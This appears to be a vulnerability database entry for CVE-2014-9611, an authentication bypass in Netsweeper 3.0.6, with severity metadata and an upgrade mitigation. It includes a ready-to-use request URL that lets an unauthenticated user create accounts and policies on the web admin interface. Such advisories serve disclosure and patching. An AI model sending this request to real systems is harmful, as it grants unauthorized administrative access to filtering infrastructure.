vendor:
Netsweeper
by:
Anastasios Monachos
9,8
CVSS
CRITICAL
Authentication Bypass
287
CWE
Product Name: Netsweeper
Affected Version From: 3.0.6
Affected Version To: 3.0.6
Patch Exists: Yes
Related CWE: CVE-2014-9611
CPE: a:netsweeper:netsweeper
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014
Netsweeper 3.0.6 – Authentication Bypass (Account and Policy Creation)
An non-authenticated is able to provision new user accounts (and also create new policies under the same name as the newly created user accounts) by using the URL Path: http:/netsweeper:8080/webadmin/nslam/index.php?username=secuid0&password=secuid0&ip=127.0.0.1&theme=Global%20Web%20Admin%20Theme&groupname=
Mitigation:
Upgrade to latest version.